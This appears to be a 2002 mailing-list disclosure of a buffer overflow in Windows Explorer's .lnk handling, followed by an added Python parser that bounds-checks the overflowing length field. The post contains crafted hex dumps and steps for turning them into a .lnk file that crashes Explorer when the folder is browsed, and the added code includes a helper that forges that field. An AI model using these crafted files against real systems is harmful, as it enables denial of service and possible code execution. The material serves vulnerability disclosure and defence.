It seems that the handling of .lnk files has a few problems. I have tested on both win98 and win2000 sp2 server. Can anyone test further? Note that the actions taken by these .lnk files have the possibility of causing damage to a system and should not be tested on an essential server :-)

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2 +,RG New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
-------------------------------------------------------------------

This causes FF FF to be loaded into a register used to control the length of data copied. Usually causes an error when right clicking on the file in explorer. Sometimes it is required to select properties. Errors seen include unable to read, unable to write. Since we are controlling the length of the data copied, these errors are self-explanatory. Would seem that explorer/shell32.dll is copying too much data when reading the filename?

OK, so this causes the read/write errors and halts progress. But if we substitute valid values such as 01 01 (CC CC) then the buffer still gets overflowed, but we bypass this error and our corrupt values get further down in the program.

-------------------------------------------------------------------
32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2 +,RG New
54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
-------------------------------------------------------------------

This one does not cause the read/write errors but causes a DoS in explorer just by browsing to the folder holding the file. This is more interesting, but involves tracking a lot of assembler code. Worst result would be some sort of code executed just by browsing a folder. Virus related perhaps. Any feedback on results or further research into this problem would be appreciated.

Notes:
Do not save to your desktop.
Rename the file to .lnk
This is the win98 file. You can easily modify a 2000 or other lnk file as detailed above.

Brett Moore
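The post does not name the structure its dumps come from. The following is an added example, not code from the post's author or from Microsoft: it reads the dumped bytes as a type 0x32 file-entry shell item (two bytes of type and padding, a 32-bit file size, a FAT date and time, attributes, the long name, the 8.3 name, then a 16-bit extension-block size) and applies the bounds check the post argues Explorer lacks, refusing any length that points past the bytes actually present. That layout is an assumption of the example; it is a plausible one because the FAT date it decodes from the dump, 24 June 2002, is two days before the archive date. The short-name reader also stops at the first non-ASCII byte, an assumption needed because the dumps overwrite that name's terminator with the injected length bytes. The helper names are the example's own.

```python
"""Parse the file-entry shell item from the post's dumps and bounds-check the
16-bit field that, on the post's reading, ends up as a copy length.

Added example. The field layout is an assumption about the dumped bytes, not
something the post states.
"""
import struct

# Bytes transcribed from the two hex dumps in the post (constructed from the
# dumps as printed, not captured from a file).
POSTED_FFFF = bytes.fromhex(
    "32 00 1A 00 00 00 D8 2C 52 47 20 00 4E 65 77 20"
    "54 65 78 74 20 44 6F 63 75 6D 65 6E 74 2E 74 78"
    "74 00 4E 45 57 54 45 58 7E 33 2E 54 58 54 FF FF"
    "FF FF 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
)
POSTED_CCCC = bytes.fromhex(
    "32 00 1A 00 00 00 D8 2C 52 47 20 00 4E 65 77 20"
    "54 65 78 74 20 44 6F 63 75 6D 65 6E 74 2E 74 78"
    "74 00 4E 45 57 54 45 58 7E 33 2E 54 58 54 CC CC"
    "CC CC 0F 0F 0F 0F 0F 0F FF F0 F0 F0 F0 F0 F0 F0"
    "AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA"
    "AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA AA"
)


class ShellItemError(ValueError):
    """Raised when a field of the item cannot be trusted."""


def _read_name(data, pos):
    """Read a NUL-terminated ASCII name at pos; return (text, next_pos).

    Assumption: a byte >= 0x80 also ends the name (without being consumed),
    because the posted dumps overwrite the 8.3 name's NUL with the length.
    """
    end = pos
    while end < len(data) and data[end] != 0 and data[end] < 0x80:
        end += 1
    text = data[pos:end].decode("ascii")
    if end < len(data) and data[end] == 0:
        end += 1  # consume the terminator
    return text, end


def fat_datetime(date, time):
    """Decode a FAT (DOS) date/time pair into 'YYYY-MM-DD HH:MM:SS'."""
    year, month, day = 1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F
    hour, minute, second = time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2
    return f"{year:04d}-{month:02d}-{day:02d} {hour:02d}:{minute:02d}:{second:02d}"


def parse_file_entry(data):
    """Parse one type-0x32 file entry; refuse a length that runs past the item."""
    if len(data) < 12 or data[0] != 0x32:
        raise ShellItemError("not a type 0x32 file entry")
    _type, _pad, file_size, fat_date, fat_time, attrs = struct.unpack_from("<BBIHHH", data, 0)
    long_name, pos = _read_name(data, 12)
    short_name, pos = _read_name(data, pos)
    pos += pos & 1  # the extension block starts on a 16-bit boundary
    if pos + 2 > len(data):
        raise ShellItemError("item ends before the extension length field")
    (ext_len,) = struct.unpack_from("<H", data, pos)
    remaining = len(data) - pos  # bytes left, counting the size field itself
    if ext_len > remaining:
        # The check the post suggests is missing: 0xFFFF here would drive a
        # copy far beyond the 50 bytes that actually follow in the dump.
        raise ShellItemError(
            f"extension length 0x{ext_len:04X} exceeds the {remaining} bytes remaining"
        )
    return {
        "file_size": file_size,
        "modified": fat_datetime(fat_date, fat_time),
        "attributes": attrs,
        "long_name": long_name,
        "short_name": short_name,
        "ext_len": ext_len,
    }


def build_file_entry(long_name, short_name, ext_payload, *, ext_len=None):
    """Build a well-formed item; ext_len lets a caller forge the length field."""
    header = struct.pack("<BBIHHH", 0x32, 0, 26, 0x2CD8, 0x4752, 0x20)  # header from the dump
    body = header + long_name.encode("ascii") + b"\x00" + short_name.encode("ascii") + b"\x00"
    if len(body) & 1:
        body += b"\x00"  # alignment pad before the extension block
    if ext_len is None:
        ext_len = 2 + len(ext_payload)  # the size field counts itself
    return body + struct.pack("<H", ext_len) + ext_payload


def check(data):
    """Return 'ok' or the reason the item was rejected."""
    try:
        parse_file_entry(data)
        return "ok"
    except ShellItemError as exc:
        return str(exc)


if __name__ == "__main__":
    benign = build_file_entry("New Text Document.txt", "NEWTEX~3.TXT", b"\x00" * 14)
    print("rebuilt item :", check(benign), parse_file_entry(benign))
    print("FF FF dump   :", check(POSTED_FFFF))
    print("CC CC dump   :", check(POSTED_CCCC))
    print("01 01 forged :", check(build_file_entry("a.txt", "A.TXT", b"\x00" * 6, ext_len=0x0101)))
```

Running it shows both posted dumps rejected on the length field, while a rebuilt item with a consistent length parses and yields the long name, short name and the 2002-06-24 modification date carried in the dump's header.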
This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 09:52:52 PDT